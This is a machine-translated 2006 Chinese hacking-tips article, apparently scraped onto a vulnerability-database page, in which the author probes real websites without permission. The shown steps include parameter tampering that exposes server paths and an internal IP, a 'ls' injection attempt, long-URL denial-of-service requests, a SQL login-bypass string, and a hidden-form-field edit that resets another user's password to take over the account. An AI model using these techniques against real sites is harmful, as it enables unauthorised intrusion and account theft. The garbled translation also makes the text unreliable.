Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
myhack58佚名MYHACK58:6220067204
HistoryFeb 17, 2006 - 12:00 a.m.

Hacking tips-domestic famous website vulnerability-vulnerability warning-the black bar safety net

2006-02-1700:00:00
佚名
www.myhack58.com
9
JSON

Recently about system vulnerabilities,has nothing of interest. Because now a patch out very quickly. The large site has been nothing system. Even if you use twwwscan,namp, etc. might very strong scanner also impossible to scan what the hell,there,is also deceptive. But,the so-called hundred Secret must have a sparse. The greater the website, the need of script the more. While the script is relying on personal the ability to write out. Capacity is not enough,its safe to a certain problem. If you use a free script, that problem is a lot of. If the original code easy to get. Invasive up too easy.

Strongly recommended: do not use the free scripts. With a note also that modifying a security problem.

The WEB script is roughly divided into html,asp,cgi,php,jsp,xml,pl…etc. Wherein the cgi issues in the majority,it is relatively early in the script program. So its study is also relatively more. html is the most secure. Because it features the least,the script is also relatively less.

Recently some of the large site due to certain reasons, omitted the domain name test a bit. Also found a few script problems(now fixed)
<http://bbs.xxxxxx.com/cgi-bin/user_interface?Pgroup_id=10322&gt;
Will it modify
<http://bbs.xxxxxx.com/cgi-bin/user_interface?Pgroup_id=&gt;***
Will be exposed to the absolute path(possibly in order to facilitate debugging,a lot of sites have this problem)
Fail To Load the HTML Template File: Fail To Open Template File:/usr/local/oiweb/htdocs
/club/community/***. htm
Next
http://bbs.xxxxxx.com/cgi-bin/us … ///////////////////
///////
Long file names try^^,ha…expose the internal IP.
Fail To Load the HTML Template File: Fail To Open Template File:/usr/local/oiweb/htdocs/club/community//////////////////////////////////////////
//////////192.168.10.30.htm
Again
<http://bbs.xxxxxx.com/cgi-bin/user_interface?Pgroup_id=&gt;‘ls’
The emergence of the SQL processing error. Unfortunately,didn’t go to the test how to use.
Last
http://bbs.xxxxxxx.com/cgi-bin/u … ///////////////////
/////////////////////////////////////////////////////////////////////////////
Ultra-long file names, attack(apache for long file name url is very easy to go wrong)
Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request. Please contact the server administrator, [email protected] and inform them of the time the error occurred, and anything you might have done that may have caused the error. More information about this error may be available in the server error log.
--------------------------------------------------------------------------------
Apache/1.3.12 Server at bbs.xxxxxx.com Port 8 0
! ,denial of service. Estimated just xxx. xxx. xx. xx go wrong! ,
Denial of service,the above method of testing has been a failure. Other services normal.
(At the time also thought immediately hit a patch?^^)
This vulnerability useless,just know that even if a large website is also a BUG,hehe^_^
Later on in addition a large site to the test!

<http://training.yyyyyy.com/&gt;
Test a couple of authentication vulnerabilities. Including that the 1’ or passwd 〈〉 '1
Didn’t success:)later registered a redh,landing inside.:)
Looks are nothing…
Then selected the Modify[modify personal information]
Get a look,just found the problem:)
Which turned out to be directly to modify the password,and there is a user cookie
OK,since discovered,of course, is the operation:)
Open source code- > The search- > the post
the < form method=“post” name=form1 id=form1 action=“Myschool/StudentUpdate1. asp” > the
Find this line,of action.
the < form method=“post” name=form1 id=form1 action=“http://training.yyyyyy.com/Myschool/StudentUpdate1.asp”; > the
Then find username
〈tr〉〈td width=“1 6%” class=bt align=right > the* user name: 〈/td〉
< td width=“3 2%” class=nr align=left > the redh〈/td〉//username:)
Changed to sp. (You want to change the username)
然后 保存 成 a.htm
After running,the password is set to 1 2 3(see you like)
the post the past…well,jump to the home page…no success…
And then I looked at the original code…
See this:
< input type=hidden name=Customer value=“redh” > the
:)The original cookie to run this…
OK,modified a bit…
< input type=hidden name=Customer value=“sp” > the
Re-post,ha…succeed…
Landing sp,1 2 3^_^go in. Look at the information on the Modify. With the modified time is written as.
---------------------------------------------

Want to the way,a large website, as long as there is the use of a large number of scripts. Certainly the presence of XX problem. This problem maybe due to negligence,perhaps due to the writing skill caused by lack of. As long as your patience to look. It will be found. Of course, the language must also be familiar with the. You can’t say about the CGI not at all,but to find it a problem. The site wanted to say:
1,less free stuff,cheap no good goods.
2,The security issue must pay attention to. Small negligence may cause big security issues(magic is also God)

JSON